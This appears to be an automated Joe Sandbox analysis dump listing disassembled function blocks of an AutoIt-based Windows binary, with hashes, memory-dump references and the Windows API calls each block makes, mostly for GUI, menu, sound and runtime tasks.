                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: 3c5fd4845fbe030b476459c24dd5930755e325a032d3456d1112e428e2fd5554
                                                        • Instruction ID: 01ea4644d2e521b5217065a7441971f039550007bdafab0286bc6c89b90ab0e4
                                                        • Opcode Fuzzy Hash: 3c5fd4845fbe030b476459c24dd5930755e325a032d3456d1112e428e2fd5554
                                                        • Instruction Fuzzy Hash: AA416C3210025A8FCF11EF11DA55AEE3770AF19300F594464FD5A2B2A2DB709D9FCBA1
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000FE2A0,00000010,?,Bad directive syntax error,0014F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0011F7C2
                                                        • LoadStringW.USER32(00000000,?,000FE2A0,00000010), ref: 0011F7C9
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • _wprintf.LIBCMT ref: 0011F7FC
                                                        • __swprintf.LIBCMT ref: 0011F81E
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0011F88D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1506413516-4153970271
                                                        • Opcode ID: 6b59b714d939457b377568d2466521dbad4c28d4e8fa4563754eaa1163c97b29
                                                        • Instruction ID: 76e8014b80346abd719d1937b6e714b41ca211ae48fee724d602947fc89069c4
                                                        • Opcode Fuzzy Hash: 6b59b714d939457b377568d2466521dbad4c28d4e8fa4563754eaa1163c97b29
                                                        • Instruction Fuzzy Hash: 6021593294021EAFCF15EFA0CC4AFEE7739BF28310F04446DB509661A2EB71A659DB50
                                                        APIs
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                          • Part of subcall function 000C7924: _memmove.LIBCMT ref: 000C79AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00125330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00125346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00125357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00125369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0012537A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 64bc4e4cc1dd788058ffb300863382c12ef45b6a3cce1e9661653e46b4917774
                                                        • Instruction ID: 1edd61e9c0c78dd44483376c16ba7eab4c0a22ffdebe9030e5b457792bc5fbec
                                                        • Opcode Fuzzy Hash: 64bc4e4cc1dd788058ffb300863382c12ef45b6a3cce1e9661653e46b4917774
                                                        • Instruction Fuzzy Hash: D0116031A9016979D724F765DC8AEFFBA7CFB95B50F40042DB419A20D2DFB01D45C9A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: f735f88c6150889773a1fc1e741defe2624dd2eb50a0e6f7fe272cd822c178a7
                                                        • Instruction ID: 4c911f140fec2dda36656a8cb554a5c0ffd2abf4af812d288e6a8a56608c1cb6
                                                        • Opcode Fuzzy Hash: f735f88c6150889773a1fc1e741defe2624dd2eb50a0e6f7fe272cd822c178a7
                                                        • Instruction Fuzzy Hash: CE110A35504124AFDB14AB70EC4AEEA77BCEF02711F0401BAF555A61A2FF749ED28650
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00124F7A
                                                          • Part of subcall function 000E049F: timeGetTime.WINMM(?,7694B400,000D0E7B), ref: 000E04A3
                                                        • Sleep.KERNEL32(0000000A), ref: 00124FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00124FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00124FEC
                                                        • SetActiveWindow.USER32 ref: 0012500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00125019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00125038
                                                        • Sleep.KERNEL32(000000FA), ref: 00125043
                                                        • IsWindow.USER32 ref: 0012504F
                                                        • EndDialog.USER32(00000000), ref: 00125060
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 8d379584adc943e0014d64c39da7c6623b6a9a69d188bf95b5285edfb6ea6888
                                                        • Instruction ID: 20183cd06d0f40dcf96a0fe0ca97bdb814bdba2748b5f1717ac9a275b2bd683c
                                                        • Opcode Fuzzy Hash: 8d379584adc943e0014d64c39da7c6623b6a9a69d188bf95b5285edfb6ea6888
                                                        • Instruction Fuzzy Hash: E121C078200A05EFE7105F60FDC8A263B6BEB4A785F141028F10582AB1DB718EE18B72
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • CoInitialize.OLE32(00000000), ref: 0012D5EA
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0012D67D
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0012D691
                                                        • CoCreateInstance.OLE32(00152D7C,00000000,00000001,00178C1C,?), ref: 0012D6DD
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0012D74C
                                                        • CoTaskMemFree.OLE32(?,?), ref: 0012D7A4
                                                        • _memset.LIBCMT ref: 0012D7E1
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0012D81D
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0012D840
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0012D847
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0012D87E
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0012D880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: e7fe5378f33dc91e952d753fe1fe4da56aac3adba5b71421f77719a6960f72a2
                                                        • Instruction ID: 4e13369551d7d7cad005a679622cd720768a5f6e1ef0c459c34a33b634c11800
                                                        • Opcode Fuzzy Hash: e7fe5378f33dc91e952d753fe1fe4da56aac3adba5b71421f77719a6960f72a2
                                                        • Instruction Fuzzy Hash: E6B1DD75A00119AFDB04DFA4D888EAEBBB9FF49314F148469F909EB261DB30ED45CB50
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0011C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0011C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0011C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0011C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0011C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0011C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0011C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0011C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0011C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0011C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0011C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0011C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 0cc84aa2a41768ac815d9c2d286a951a8d0d79b5cb1ece42b5dc4bb947f98edb
                                                        • Instruction ID: c5b09233fe2015785c29ba40cf3940c38633980ee975c4e63915951120e5d9e4
                                                        • Opcode Fuzzy Hash: 0cc84aa2a41768ac815d9c2d286a951a8d0d79b5cb1ece42b5dc4bb947f98edb
                                                        • Instruction Fuzzy Hash: 21516E75B00205AFDB18CFA9DD89AAEBBBAFB88311F14813DF515D72A0D7709D418B50
                                                        APIs
                                                          • Part of subcall function 000C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000C2036,?,00000000,?,?,?,?,000C16CB,00000000,?), ref: 000C1B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000C20D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000C216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 000FBCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000FBCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000FBCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000FBD0A
                                                        • DeleteObject.GDI32(00000000), ref: 000FBD1C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: b22507ff6b5d9efaff32ae1426fc706d0a890ed6ddc7ae1f85e9c20da6565fc9
                                                        • Instruction ID: c4e160584fc5e7be706805dc6cf6688d0c3d835a1f56e69098ca27d7c7facdb3
                                                        • Opcode Fuzzy Hash: b22507ff6b5d9efaff32ae1426fc706d0a890ed6ddc7ae1f85e9c20da6565fc9
                                                        • Instruction Fuzzy Hash: 35618935100A04DFCB359F15C948B2EBBF2FB51312F64852EE6429AE72C770A991EF91
                                                        APIs
                                                          • Part of subcall function 000C25DB: GetWindowLongW.USER32(?,000000EB), ref: 000C25EC
                                                        • GetSysColor.USER32(0000000F), ref: 000C21D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 7989977fa16ae98aa68a639e8cc22ea5d8247eb9cc274d729da40ecfbdee44f6
                                                        • Instruction ID: e1987c4f2337e0439fcd7ab7b45093a9f8449fa8c4842edff1a36775c43bb7ea
                                                        • Opcode Fuzzy Hash: 7989977fa16ae98aa68a639e8cc22ea5d8247eb9cc274d729da40ecfbdee44f6
                                                        • Instruction Fuzzy Hash: 47419335100544EEDB219F28DC48FBD3BA5EB06731F154269FE658AAF1C7318C82EB11
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,0014F910), ref: 0012A90B
                                                        • GetDriveTypeW.KERNEL32(00000061,001789A0,00000061), ref: 0012A9D5
                                                        • _wcscpy.LIBCMT ref: 0012A9FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 401c85cb531a191135e5885cd3e49c9590346c370bf6bd50659e15be9a005716
                                                        • Instruction ID: a5ea1c09d0b141bf5d9c8842a99c25634a5519ccf82bf525de1bc83bf8651a0d
                                                        • Opcode Fuzzy Hash: 401c85cb531a191135e5885cd3e49c9590346c370bf6bd50659e15be9a005716
                                                        • Instruction Fuzzy Hash: 5051EC31108311AFC704EF15D992EAFB7A5EF84308F95482DF58A672A2DB30D999CB53
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: d46658cf8e1356442f24d748d975bc0f9ccb1e16b3150fa50d810575ddd565a6
                                                        • Instruction ID: b2fe8c212faa5564b945126b68cea6bb9b34415d0824b9f110c9e02b5421b44b
                                                        • Opcode Fuzzy Hash: d46658cf8e1356442f24d748d975bc0f9ccb1e16b3150fa50d810575ddd565a6
                                                        • Instruction Fuzzy Hash: 2841F37150460AAEEB24DF34DC46FBE77E8EF45700F2044AEE649DB282EE71A9459B10
                                                        APIs
                                                        • _memset.LIBCMT ref: 0014716A
                                                        • CreateMenu.USER32 ref: 00147185
                                                        • SetMenu.USER32(?,00000000), ref: 00147194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00147221
                                                        • IsMenu.USER32(?), ref: 00147237
                                                        • CreatePopupMenu.USER32 ref: 00147241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0014726E
                                                        • DrawMenuBar.USER32 ref: 00147276
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: 34e5b997595032a9f46ceccc13f7307cf8e24effeba9c425977f9575448e5e1e
                                                        • Instruction ID: 9ad1d31697684892cf5c5ea510c8041580fd4999b3d01068a125a972c633bd78
                                                        • Opcode Fuzzy Hash: 34e5b997595032a9f46ceccc13f7307cf8e24effeba9c425977f9575448e5e1e
                                                        • Instruction Fuzzy Hash: 18418878A01209EFDB20DFA4D984E9ABBF5FF09350F154529F905AB3A1D771AA10CF90
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0014755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00147565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00147578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00147580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0014758B
                                                        • DeleteDC.GDI32(00000000), ref: 00147594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0014759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 001475B2
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 001475BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: ba6f0e9bb037c04b3b2770ac6adc2ce442f48eb691e6176cbbab195c376edca3
                                                        • Instruction ID: 6b8b33984fd3aa9c29a738872758dd02ca867b3ad6fb7d115399e8776c91c7ce
                                                        • Opcode Fuzzy Hash: ba6f0e9bb037c04b3b2770ac6adc2ce442f48eb691e6176cbbab195c376edca3
                                                        • Instruction Fuzzy Hash: 71316C76105214BFDF119F64DC48FEA3B69EF0A761F110228FA159A1F0C731D852DBA4
                                                        APIs
                                                        • _memset.LIBCMT ref: 000E6E3E
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        • __gmtime64_s.LIBCMT ref: 000E6ED7
                                                        • __gmtime64_s.LIBCMT ref: 000E6F0D
                                                        • __gmtime64_s.LIBCMT ref: 000E6F2A
                                                        • __allrem.LIBCMT ref: 000E6F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E6F9C
                                                        • __allrem.LIBCMT ref: 000E6FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E6FD1
                                                        • __allrem.LIBCMT ref: 000E6FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E7006
                                                        • __invoke_watson.LIBCMT ref: 000E7077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: 6429b1b5e80f25d07b2cc9613b41e5355beb2c6a9d8053df720ec4ebac59fbed
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: A6711772A00756AFD714AE6AEC41BAAB3E8AF14764F148139F514F76C2E771E9008790
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122542
                                                        • GetMenuItemInfoW.USER32(00185890,000000FF,00000000,00000030), ref: 001225A3
                                                        • SetMenuItemInfoW.USER32(00185890,00000004,00000000,00000030), ref: 001225D9
                                                        • Sleep.KERNEL32(000001F4), ref: 001225EB
                                                        • GetMenuItemCount.USER32(?), ref: 0012262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0012264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00122675
                                                        • GetMenuItemID.USER32(?,?), ref: 001226BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00122700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00122714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00122735
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: f19eb273a09a740fc41736f0675fe422f6b6779033a906c7dd20d9618417c67c
                                                        • Instruction ID: d7fd505f7c1490b4454efc92cb411d7a830c31d33374b1498862b12a13ee532a
                                                        • Opcode Fuzzy Hash: f19eb273a09a740fc41736f0675fe422f6b6779033a906c7dd20d9618417c67c
                                                        • Instruction Fuzzy Hash: CD61DF75900269BFDB21CF64EC88EFE7BB9EB02304F544159F841A7260D731AE66CB20
                                                        APIs
